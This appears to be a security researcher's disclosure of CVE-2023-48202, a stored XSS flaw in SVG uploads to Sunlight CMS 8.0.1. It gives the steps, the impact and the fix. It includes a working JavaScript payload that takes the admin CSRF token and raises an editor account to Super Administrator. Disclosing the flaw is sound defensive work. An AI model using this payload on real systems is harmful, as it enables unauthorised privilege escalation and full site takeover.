Mechaneus Security Research and Bug Hunting

View on GitHub

CVE-2023-48202: Stored Cross-Site Scripting (XSS) in SVG image file uploaded in File Manager in Sunlight CMS 8.0.1

https://github.com/sunlight-cms/sunlight-cms

Vulnerability Type

CWE-79: Cross-site Scripting (XSS) - Stored

CVSS 5.4 MEDIUM

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Description

A user that is in the ‘Editors’ group or any group that can upload files in the File Manager, is able to upload an SVG file with malicious Javascript code. After an Administrator or Super Administrator clicks and opens the image, the malicious code is executed.

Execution steps

  1. Create the new user ‘editor1’ and adde it to the group ‘Editors’.
  2. The user ‘editor1’ uploads a malicious SVG file.
  3. Access the image using the File Manager as a Super Administrator to execute the malicious code in the SVG image.
  4. User ‘editor1’ is added to the ‘Super Administrators’ group.

Impact

Stored Cross-Site Scripting vulnerability in Sunlight CMS 8.0.1 allows an authenticated low-privileged user to escalate his privileges. A malicious user that is in the ‘Moderators’ group or any group that can upload files in the File Manager, can escalate his privileges to any higher level group, including Administrators and Super Administrators without being authorized. The malicious user can then create, edit and delete any content in the CMS, create/edit/delete users with any privilege and read the database using the backup functionality.

Remediation

Sanitize SVG image files by removing scripts before rendering or convert SVG image files to safer formats like PNG and JPG.

Proof of Concept code

Create a valid SVG image file and then add the following code:

<script type="text/javascript">
	var csrf_token;
	var xhrGET_users_edit = new XMLHttpRequest(); 
	xhrGET_users_edit.responseType = "document"; 
	xhrGET_users_edit.onreadystatechange = function() {	
		if (this.readyState == 4 &amp;&amp; this.status == 200) {
			var doc = this.responseXML ;
			csrf_token = doc.getElementsByName("_security_token")[0].value;		
			var xhr = new XMLHttpRequest();
			xhr.open("POST", "http:\/\/sunlight\/admin\/index.php?p=users-edit&amp;id=editor1", true);
			xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
			xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7");
			xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
			xhr.withCredentials = true;
			var body = "username=editor1&amp;publicname=editor1&amp;email=editor1%40test.tk&amp;password=&amp;group_id=1&amp;wysiwyg=1&amp;public=1&amp;note=&amp;_security_token="+csrf_token;
			var aBody = new Uint8Array(body.length);
			for (var i = 0; i &lt; aBody.length ; i++)
				aBody[i] = body.charCodeAt(i); 
			xhr.send(new Blob([aBody]));
		}
	};
	xhrGET_users_edit.open("GET", "/admin/index.php?p=users-edit&amp;id=editor1", true);
	xhrGET_users_edit.send();
</script>

References